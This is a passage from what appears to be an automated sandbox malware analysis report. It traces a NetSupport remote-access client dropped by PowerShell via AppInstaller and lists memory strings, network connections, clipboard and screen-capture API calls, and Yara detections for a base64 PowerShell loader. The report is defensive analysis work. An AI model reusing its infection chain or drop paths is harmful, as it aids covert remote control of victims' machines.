0000000E.00000003.1694932844.00000196D5C47000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1688507189.00000196D5C3C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2153475118.000002A99FBC8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2174777930.000002A99FE3E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2656943644.000002A99FD22000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2172597262.000002A99FC8C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2171518364.000002A99FBCE000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2130006171.000002A99FC7B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2137618649.000002A99FBCA000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2134290511.000002A99FD21000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2119229019.000002A99FBCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://microsoft.sharepoint.com/teams/appxmanifest/SitePages/Home.aspx
                                    Source: powershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2901D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                                    Source: powershell.exe, 00000017.00000002.2180463385.000001E11E621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                    Source: AppInstaller.exe, 00000024.00000003.2183907074.000002A99FD14000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2141059449.000002A99FE3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://osgwiki.com/wiki/Manifest_Request
                                    Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
                                    Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
                                    Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
                                    Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                                    Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                                    Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.26.dr, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr, TCCTL32.DLL.26.drString found in binary or memory: https://www.globalsign.com/repository/0
                                    Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.drString found in binary or memory: https://www.globalsign.com/repository/03
                                    Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.drString found in binary or memory: https://www.globalsign.com/repository/06
                                    Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
                                    Source: powershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2062772287.000002B2F5E82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wsj.com/
                                    Source: powershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.wsj.com/vice
                                    Source: powershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wsj.com/x
                                    Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,32_2_1101F350
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,32_2_1101F350
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11032870 GetClipboardFormatNameA,SetClipboardData,32_2_11032870
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11031B70 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,32_2_11031B70
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,32_2_110076F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,32_2_11110930
                                    Source: Yara matchFile source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7408, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\ProgramData\netsupport\client\PCICL32.DLL, type: DROPPED
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\APPX.u5y27yz6k3vi25fmvsudde2mb.tmpJump to dropped file

                                    Spam, unwanted Advertisements and Ransom Demands

                                    barindex
                                    Contains functionalty to change the wallpaper
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,32_2_11112960

                                    System Summary

                                    barindex
                                    Malicious sample detected (through community Yara rule)
                                    Source: amsi64_7788.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                    Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                    Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                    Powershell drops PE file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICHEK.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\msvcr100.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\AudioCapture.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\TCCTL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\remcmdstub.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\client32.exeJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\pcicapi.dllJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\PCICL32.DLLJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\netsupport\client\HTCTL32.DLLJump to dropped file
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110A9020: DeviceIoControl,32_2_110A9020
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1115A250 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,32_2_1115A250
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102D1B3
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,32_2_1102CE84
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BAF41B8E23_2_00007FF9BAF41B8E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BAF311D823_2_00007FF9BAF311D8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BAF3449D23_2_00007FF9BAF3449D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BAF4578323_2_00007FF9BAF45783
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CE7A923_2_00007FF9BB3CE7A9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CCC3B23_2_00007FF9BB3CCC3B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C9C9D23_2_00007FF9BB3C9C9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C449D23_2_00007FF9BB3C449D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B1CAD23_2_00007FF9BB3B1CAD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CACCE23_2_00007FF9BB3CACCE
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C7C6D23_2_00007FF9BB3C7C6D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3BB32D23_2_00007FF9BB3BB32D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C5B2D23_2_00007FF9BB3C5B2D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CC33D23_2_00007FF9BB3CC33D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3B5B5123_2_00007FF9BB3B5B51
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C6B0D23_2_00007FF9BB3C6B0D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C63A423_2_00007FF9BB3C63A4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CBB6523_2_00007FF9BB3CBB65
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CA35D23_2_00007FF9BB3CA35D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3BC38923_2_00007FF9BB3BC389
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3CB1FD23_2_00007FF9BB3CB1FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF9BB3C7A1423_2_00007FF9BB3C7A14
